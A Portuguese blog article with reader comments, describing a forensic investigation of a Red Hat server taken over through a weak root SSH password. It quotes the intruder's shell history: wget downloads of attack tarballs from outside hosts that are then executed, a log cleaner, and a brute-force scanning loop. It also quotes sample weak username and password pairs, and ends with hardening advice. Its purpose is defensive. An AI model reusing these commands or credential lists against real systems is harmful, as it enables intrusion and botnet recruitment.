- Publicado na Linux Magazine, edição de dezembro de 2006 (que só chegou nas bancas em fevereiro de 2007 !!!).
- Arquivo original em formato ODF e PDF.
- Mais artigos
Qualquer administrador de firewall pode observar em seus registros que uma máquina conectada à Internet não fica um minuto sequer, 24 horas por dia, livre de tentativas de invasão. Tem sempre alguém fazendo uma varredura, tentando algum tipo estranho de conexão, requisitando URLs inseguras aos servidores web, enfim, batendo na porta. Parece que as pessoas têm se protegido bem já que não lembro de ter ouvido histórias detalhadas sobre um ataque efetivamente acontecendo.
Tive a oportunidade de analisar um computador que foi invadido e vou relatar aqui as evidências que os crackers deixaram para trás, como as descobrimos, e o que lhes interessava naquela máquina. Vou usar nomes fictícios e mascarar alguns IPs para resguardar a privacidade de todos.
Vamos chamar os invasores de crackers, porque hackers somos todos nós que respiramos tecnologia, “fuçadores” (tradução da palavra hacker), exploradores, pessoas curiosas. Somos todos hackers porque usamos nossas mentes poderosas para resolver problemas, ganhar dinheiro licitamente, enfim, fazer o bem. Um cracker por outro lado, usa seu conhecimento para invadir, deteriorar, tirar vantagem, e dar trabalho aos hackers administradores de redes. Um cracker é um mau hacker, e um bom hacker pode impedir a ação de um cracker.
Os Rastros Deixados pelo Cracker
O servidor em questão era uma máquina de testes internos na empresa A, que em determinado momento foi deslocada para um novo teste conectada à Internet, sem uma reinstalação. Tudo começou quando, poucas semanas após estar conectada à Internet, uma empresa que chamaremos de B, enviou um e-mail para P (provedor do link físico para a máquina atacada) informando que detectou uma tentativa de ataque, e requisitou um retorno. P encaminhou o e-mail para A, e esse continha alguns logs com a prova da tentativa de invasão:
Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:36:27 sshd[PID]: refused connect from IP.IP.IP.IP Feb 22 12:26:27 sshd[PID]: refused connect from IP.IP.IP.IP
Eles mostravam que o IDS (Intrusion Detection System) de B acusou que a máquina atacada (cujo endereço IP está representado por IP.IP.IP.IP) tentou se logar várias vezes sem sucesso em seu serviço SSH (sshd). Reparem que o instante de todas as tentativas, até os segundos, é o mesmo, o que leva a crer que não é um ser humano, e sim algum software que muito rapidamente está testando várias combinações de usuário e senha ao mesmo tempo.
Fui chamado para dar explicações porque havia fornecido informalmente por telefone algumas dicas de como proteger a máquina. Primeiramente, era necessário dar subsídios ao provedor P para responder ao e-mail de B, dando uma satisfação formal. Isso é uma atitude de responsabilidade de um bom administrador de rede, e demonstra a preocupação em manter o nível de serviço da Internet o mais alto possível.
A máquina foi colocada em quarentena, desligada da Internet e começamos a analisá-la. Tratava-se de um Red Hat Enterprise Linux 3 Update 5. Não estou dizendo que o Red Hat Linux é menos ou mais seguro. Isso não é muito intuitivo de se entender, mas segurança não tem quase nada a ver com o software. Segurança não é um firewall, não é criptografia, nem um conjunto de produtos que tem proteção como objetivo. Segurança é um processo que deve ser seguido conscientemente por administradores de redes. Se um ataque acontece, toda a responsabilidade é do administrador, e não do sistema operacional, seja ele qual for, e do fabricante que for. O administrador precisava agora descobrir como o cracker invadiu para, corajosamente, assumir a falha e não permitir que isso aconteça novamente.
Logo no boot da máquina observamos consecutivas mensagens estranhas que não deviam estar lá e que continham o texto “(swap)”. Começamos a analisar o processo de inicialização do sistema, a partir do arquivo /etc/inittab. Vimos que um dos primeiros scripts que são executados no sistema é o /etc/init.d/functions e fizemos os seguintes testes:
bash$ rpm -qf /etc/init.d/functions initscripts-7.93.20.EL bash$ rpm -V initscripts S.5....T c /etc/rc.d/init.d/functions
Verificamos que este arquivo faz parte (rpm -qf) do pacote initscripts, e em seguida testamos sua integridade (rpm -V). Descobrimos que o arquivo foi alterado: o número 5 significa que o MD5 do arquivo mudou, ou, em outras palavras, que o conteúdo do arquivo mudou. O RPM sabe disso comparando o MD5 do arquivo atual no disco, com o MD5 registrado em seu banco de dados no momento da instalação do pacote.
Mas o que foi alterado no script functions ?
A última linha do script era esta:
/usr/bin/crontabs -t1 -X53 -p
Suspeitamos imediatamente porque o comando crontab não se chama “crontabs”. Confirmamos novamente com o RPM:
bash$ rpm -qf /usr/bin/crontabs o ficheiro /usr/bin/crontabs não pertence a nenhum pacote
Pronto. Estava constatado que esse tal comando crontabs era alienígena e não deveria estar ali. Foi, com certeza, implantado pelo cracker. Mas não paramos aqui. Queríamos saber o que este programa fazia. Como era um binário, tentamos extrair algumas strings dele:
bash$ strings /usr/bin/crontabs [...] "smbd -D" "(swapd)" & [...]
Ou seja, era este tal crontabs que mandava para a tela as mensagens com a string “(swap)”. Mas descobrimos outra coisa: o alienígena continha também a string “smbd -D”, que se parece com o nome do serviço do Samba. Nem perdemos tempo usando os comandos ps e top para verificar se um processo chamado smbd estava rodando porque usamos os mesmos rpm -qf e rpm -V para constatar que estes programas também foram modificados pelo cracker. Usamos o utilitário gráfico ksysguard (que não foi modificado) do KDE e pudemos observar um tal processo smbd -D rodando. Chamou a atenção que o ksysguard mostrava todos os processos executando sem seus parâmetros, e somente o smbd apresentava um parâmetro. Não tardou a acharmos um arquivo chamado “/usr/bin/smbd -D” (com espaço e parâmetro mesmo), e o RPM novamente nos informou que ele não fazia parte de nenhum pacote. Tratava-se de outro programa do cracker. Fomos lá tentar extrair mais algumas informações sobre este programa:
bash$ strings “/usr/bin/smbd -D" [...] Received SIGHUP; restarting. Generating new %d bit RSA key. RSA key generation complete. -b bits Size of server RSA key (default: 768 bits) By-ICE_4_All ( Hackers Not Allowed! ) SSH-%d.%d-%.50s This server does not support your new ssh version. Sent %d bit public key and %d bit host key. sshd version %.100s [%.100s] [...]
Omitimos diversas linhas para ser mais didático. A linha vermelha eliminou qualquer dúvida se um cracker havia visitado a máquina ou não. Mas o mais interessante são as linhas azuis, que levaram a crer que o famigerado programa smbd -D era um servidor SSH. O cracker deveria querer isso para manter um backdoor aberto, e poder logar com SSH quando quisesse. Em /var/log/messages encontramos a evidência final:
Feb 19 19:24:49 localhost smbd -D: RSA1 key generation succeeded Feb 19 19:24:50 localhost smbd -D: RSA key generation succeeded Feb 19 19:24:51 localhost smbd -D: DSA key generation succeeded Feb 19 19:24:51 localhost smbd -D: succeeded
Essas são mensagens típicas de um daemon SSH sendo executado pela primeira vez, quando cria suas chaves únicas de criptografia, só que bizarramente emitidas por um suposto programa com nome de Samba, o que não faz sentido algum e é forte indício que há algo errado no sistema. Ou seja, o cracker implantou um backdoor SSH, porém com um nome mascarado para seu arquivo e processo (smbd). A partir desses registros pudemos também estimar a data em que a máquina foi atacada: 19 de fevereiro.
Para o cracker poder alterar arquivos e comandos tão importantes do sistema, ele deve ter conseguido acesso de root, e por isso fomos espiar o histórico de comandos executados por este usuário no arquivo /root/.bash_history, e vimos isto:
bash# less /root/.bash_history [...] cd /usr/share/.a wget lamisto.octopis.com/mig.tgz tar xzvf mig.tgz ./mig g-u root -n 0 ./mig -u root -n 0 cd /usr/share/.a wget utilservices.iasi.rdsnet.ro/~marianu/flo.tgz tar xzvf flo.tgz...linhas omitidas... cd /var/tmp wget djanda.com/get/usr.tar.gz wget djanda.com/get/x.tar.gz tar xfvz usr.tar.gz cd usr chmod +rwxrwxrwx * ./crond cd .. tar xfvz x.tar.gz cd x chmod +rwxrwxrwx * mv unix x ./x 201.20; ./x 201.21; ./x 201.22; ./x 201.23; ./x 201.24; ./x 201.25; ./x 201. 26; ./x 201.27; ./x 201.28; ./x 201.29; ./x 201.30; ./x 201.31; ./x 201.32; ./x 201.33; ./x 201.34; ./x 201.35; ./x 201.36; ./x 201.37; ./x 201.38; ./x 201.39; ./x 201.40; ./x 201.41; ./x 201.42; ./x 201.43; ./x 201.44; ./x 201.45; ./x 201. 46; ./x 201.47; ./x 201.48; ./x 201.49; ./x 201.50 [...] /usr/sbin/adduser scanning
O formato do arquivo não permite saber quando esses comandos foram executados, mas fica evidente que o cracker criou um usuário chamado scanning, baixou arquivos de certos sites, abriu-os e executou comandos que vieram com eles. Analisamos cada um, e descobrimos que:
- No diretório /usr/share/.a ele instalou e executou o tal comando mig que aparentemente é um limpador de histórico de login do sistema. Usamos o mesmo comando strings para analisar esse binário. Isso confirmou nossa estimativa da data de ataque pois o comando last (usado para verificar esse histórico) apontou dados inconsistentes por volta de 19 de fevereiro.
- Em /var/tmp foi baixado um tal usr.tar.gz, que aparentemente é um bot de IRC. Mais tarde, com os mesmos comandos do RPM, descobrimos que o comando /bin/netstat também foi alterado, provavelmente para esconder as conexões deste bot a diversos servidores de IRC na porta padrão 6667, o que constatamos com o ksysguard. Adiante explicaremos o que um cracker faz com isso.
Mas o mais interessante foi o x.tar.gz baixado. Continha dois executáveis chamados find e take, o script chamado simplesmente de x, e um arquivo muito especial de nome code.conf. Lendo o simplíssimo script x, vendo no histórico como ele era executado muitas vezes, e usando a intuição, ficou claro que o comando find varria faixas IP inteiras em busca de portas 22 (SSH) abertas. Os hosts encontrados eram então passados para o comando take, que se encarregava de usar as 18459 combinações de usuário e senha disponíveis no arquivo code.conf para tentar se logar nas máquinas encontradas. Um login bem sucedido tinha o IP, usuário e senha registrados num arquivo que indicaria ao cracker as próximas máquinas a invadir. E sim, este arquivo já tinha uma lista de hosts e respectivas senhas em que essas ferramentas conseguiram penetrar.
Foi exatamente esse procedimento de login por força bruta que foi detectado pelo IDS da empresa B, quando o servidor deles tentou ser invadido sem sucesso.
Quando chegamos a isso, ainda não estava claro como a máquina de A foi invadida. Estava checando se e como os administradores da máquina seguiram meus conselhos informais de segurança, verificando as regras de iptables, serviços ativos, etc. Parecia tudo correto, ou não alarmantemente errado. Foi quando demos uma olhada com mais atenção no conteúdo do code.conf e entre suas mais de 18 mil linhas encontramos estas:
root passw0rd root pa55word root pa55w0rd sapdb sapdb apache apache apache 123456 apache2 apache apache2 apache2 apache2 apache123
Enquanto varríamos o arquivo com os olhos, de repente o administrador da máquina colocou a mão na testa, e com voz de lamento nos contou que a senha de root era a manjadíssima passw0rd (com um algarismo zero no lugar da letra ‘o’)! O serviço SSH estava aberto e permitia login do root pela rede. Aquela máquina também tinha sido vítima do scan do cracker, e foi assim que ele entrou e ganhou poder total.
Eu conhecia várias máquinas formais e informais que implementaram aquele mesmo esquema de segurança que foi sugerido, estavam anos conectadas à Internet, e nunca sofreram ataques. Mas uma simples senha conhecida, bem típica de ambientes de testes onde várias pessoas compartilham acessos similares e informais às máquinas, foi o calcanhar de Aquiles da pilha de segurança. Isso confirma que ataques bem sucedidos são sempre responsabilidade do administrador, e nunca do software de segurança em especial.
A Reinstalação da Máquina
Depois de um ataque como esse, e depois do relatório conclusivo, a melhor coisa é limpar completamente o disco e partir para uma reinstalação completa. Desta vez acompanhei de perto a instalação, e seguimos algumas regras simples de segurança:
- Só instalamos pacotes que sabíamos que seriam usados. Descartamos completamente a idéia de fazer uma instalação completa.
- Depois de instalado, desligamos alguns serviços que sabíamos que não seriam usados, como NIS, Samba, Portmap, NFS. E se possível os desinstalávamos.
- Criamos regras para o iptables fechando praticamente tudo menos as portas 80 (HTTP) e 443 (HTTPS).
- Requisitamos ao provedor do link P que configurasse regras semelhante em seu roteador, formando um firewall duplo.
- Por via das dúvidas, desabilitamos o acesso por SSH ao root, obrigando o administrador a se logar com um usuário qualquer e depois ganhar privilégios com o comando su. Isso funciona como uma restrição dupla para administrar a máquina.
- E dessa vez foram usadas senhas decentes, bem difíceis, com letras, números, e que não eram derivadas de palavras óbvias.
- As senhas só foram informadas verbalmente para poucas pessoas. Evitamos passar por e-mail.
Por que o Cracker Ataca ?
Uma coisa que vale explicar é o bot de IRC. Ele serve para fazer ataques de DDoS (Distributed Denial of Service). Um bot fica constantemente conectado a uma sala de IRC pré-definida. Depois de invadir várias máquinas e ativar os respectivos bots, o cracker entra nessa sala de IRC e tem ao seu dispor um exército de bots distribuídos programados para executar ações ao seu comando. O DDoS acontece quando o cracker, via comandos aos bots na sala de IRC, faz os computadores invadidos enviarem simultaneamente grandes pacotes de dados para algum site-vítima, escolhido pelo cracker. Naquele momento, o link do site-vítima fica sobrecarregado, e a sensação é que ele está fora do ar. Isso pode durar o tempo que o cracker desejar.
Esse processo foi ricamente detalhado pelo dono de um desses site-vítima, em grc.com/dos/grcdos.htm, e é leitura obrigatória a qualquer um que se interessa por segurança.
Em todas as análises que fizemos, não encontramos nada de útil no ataque do cracker. A máquina estava conectada a outras redes, mas não pareciam interessá-lo. A única conclusão que pudemos chegar é que o cracker ataca por atacar, e depois usa seu ataque para atacar mais. Só. Simplesmente isso. Sim, porque as ferramentas, técnicas e rastros deixados mostram que ele provavelmente usou ferramentas criadas por outros, talvez seguindo uma documentação que mostra os comandos prontos, passo a passo. Sem saber direito o que estava fazendo. Sem objetivos “mitnickianos”, nem financeiros, nem algo que o exaltasse perante outros crackers.
Só Freud explica…
Excelente artigo! Veio a confirmar minha suspeita, de mero usuário e administrador da pequena rede da minha casa, que a maior falha de segurança reside naquele item que fica de frente para a tela.
Artigo muito bom e elucidativo, porém esse tipo de “invasão” poderia ser facilmente eliminada efetuando dois passos básicos:
– Alterando a porta padrão do SSH
– Não permitindo login com o usuário “root”
Depois de implantada essas regras, a chance de ocorrer alguma invasão baseado em robôs de escaneamento de SSH é próxima a zero.
Humberto, é verdade.
Mas no caso a máquina foi deslocada de um ambiente fechado de testes para Internet, sem reinstalação ou maiores cuidados. Ou seja, a responsabilidade é sempre do administrador.
Se seguirmos o seu procedimento de trocar a porta e desabilitar o root, mesmo assim um scan pode detectar o SSH em outra porta e tentar outros usuários com outras senhas. O arquivo code.conf continha 18500 possibilidades diferentes.
Nada como um bom par de usuário e senha bem difícil.
Parabéns pelo excelente artigo, Avi. Difícil de se ver coisa tão bem dissecada e explicada assim fora dos domínios do SecurityFocus e afins. Teu blog já entrou nos meus bookmarks aqui!
Gostaria de acrescentar que após a perícia forense e a máquina ter sido completamente reinstalada seguindo os princípios básicos de segurança conforme ilustrado no artigo, o admnistrador poderia tomar uma atitude mais pro-ativa e instalar um IDS – Snort é fantástico – se possível ou pelo menos adotar o uso de uma ferramenta como o Tripwire, que cria um banco de dados de hashes MD5 de todos os arquivos do sistema (configurável pelo usuário pra omitir coisas como /var, obviamente). Na suspeita de invasão, basta conferir o hash dos arquivos com esse banco de dados.
O Tripwire costumava ser comercial tempos atrás, mas essa página aqui diz que há uma versão Open Source e inclusive dá os detalhes de como usá-la: http://inferno.slug.org/cgi-bin/wiki?Tripwire
Acredito que existam outras alternativas livres ao Tripwire também.
Rogério, fiquei lisongeado. Obrigado.
Você tem razão sobre IDS, mas era um ambiente de testes, e o pessoal lá não ia ter disposição para montar um IDS. Eles iam gastar mais tempo com isso do que com a solução que estavam testando.
Sobre o Tripwire e MD5, o RPM já não faz isso?
O Tripwire só seria melhor que o RPM se armazenasse esses MD5s em outra máquina.
avi,gostei da trilha do invasor,melhor ainda se voce o pegasse pq isto nao faz bem a ninguem,nao entendo quase nada de computador mais vou amprendendo devagar ja sou idoso e por isso tenho bastante tempo para ler,cheguei ao ponto de luz em virtude da gravidade de newton,teoria da relatividade e outras bobagens,ovnis,ufos,energia escura ets,e começo acreditar que o universo e finito e redondo e tem varios tipos de gravidade e que as distancias estipuladas entre sol e planetas sao bem menores do que acreditamos,a partir da velocidade maxima hipotetica como a dobra ficticia em enterprise, se fosse conseguida 9,6, a partir dai o que movimentava era o universo e nao a nave,e acredito que nao existe o infinito e nao e palpavel e apenas imaginario.sem mais um abraço e desculpe a perda de tempo.
oi no meu site tem um sistema de estação automatica que não pode sair do ar e quando sai o site tem um programa em fortran que manda mensagem no meu email eu queria saber se tem como ele mandar uma mensagem no meu celular tambem porque não é sempre que eu estou conectada ao eu email. me mande um email para cagsantos@hotmail.com quem souber me ajuda, por favor eu preciso muito de saber se tem como e se é preciso pagar por esse sistema muito obrigado!
Avi, se o invasor instalar o rootkit usando um pacote rpm, oou melhor, substituir os arquivos pelas versões alteradas via um rpm com o mesmo nome, o rpm -V não vai mostrar alteração. Isso não quer dizer que verificar alterações com o rpm não seja uma boa… basta só verificar antes se novos rpms não foram instalados no sistema.
Olá!parceiro eu tava procurando orientações sobre a instalação de 1 proxy squid,com suas funções, e reparei numa mensagem sua relatando as senhas distribuídas por bandidos virtuais com o intuito de praticar vandalismo e crimes na nossa já tão insegura web,sou estudante de redes e estou tentando aprender sobre a plataforma linux… gostaria de te parabenizar pela aula de conhecimento e riqueza de detalhes e principalmente pela invejável postura ética e desprendimento,E claro,como vc eu sou viciado em novidades,quero testar tudo,mas… sempre me esqueço…( que tem seres que se dizem humanos, mas queimam mendigos com gasolina apenas pra saber que som a carne humana faz quando queima)…e estou sempre sendo invadido ,e inevitávelmente tenho que formatar minha máquina pra limpá-la dos vermes que a infectam…espero um dia poder adquirir um conhecimento semelhante ao seu(calma! não é inveja..é reconhecimento)gostei de sua postura ética,compartilho do mesmo sentimento em relação ao vandalismo virtual,todo amante do universo virtual se indigna com essas invasões,um amigo está fazendo uma tese em que logo,logo muitos presidiários perigosos estarão aqui conosco…tentei desnvolver um projeto pra acrescentar um novo protocolo de redes pra acessos privilegiados com uma identidade digital aos verdadeiros profissionais e usuários “reais e honestos” na rede mundial,mas existem muitas barreiras atualmente o que torna essa idéia inviável…com a miniaturização dos notebooks..acho que essa tese ja está vigorando…nas universidades a segurança da informação se tornou uma obssessão…hoje o sonho de todo garotinho de lan-house é invadir o pc de suas amiguinhas e roubar suas fotos mais intimas,ou monitorar sua namorada no MSN ou ORKUT..e acabam sendo cobaias nas mãos dos verdadeiros crackers espero sinceramente um dia poder ser útil no combate aos “bandidos virtuais”…um forte cumprimento de amigo e parabéns novamente!
Olá, Avi,
No momento em que escrevo este comentário, não consigo acessar o endereço citado do sítio vítima de DoS. É isso mesmo?
Parabéns pela nota.
É isso,
Wagner.
oioi… o meu caso eu to resebendo msg web… mais nao seu de onde vem… se e da minha cidade ou uma proxima q e goiania…
como chegar,tem como eu descobrir onde fica esta lan hause… q mim manda esta msg oi pc,,,,, se puder mim ajudar e agradecooo
Avi
Eu acredito que o meu computador tenha sido invadido e está sendo monitorado por outra pessoa.
Sou a administradora e a única a utilizar o meu pc, porém quando tento gravar um arquivo, do qual esteja fazendo download, diretamente para um cd, recebo o seguinte aviso:
“Vc não tem autorização para gravar este arquivo nesta unidade (D) ou nesta pasta do CD, favor entrar em contato com o administrador e solicitar orientaçao.”
Como falar com o administrador se o administrador sou eu?
Preciso de ajuda para identificar o invasor, sua origem e deletar o arquivo contaminado.
Já tive a experiência de ter o meu pc invadido, ver a tela ficar preta e perder todas as informações que continha nele, enquanto trabalhava nos meus projetos.
Quero evitar esse tipo de experiência novamente ou similar.
Antecipadamente agradecida e aguardando seu retorno,
Cris
🙂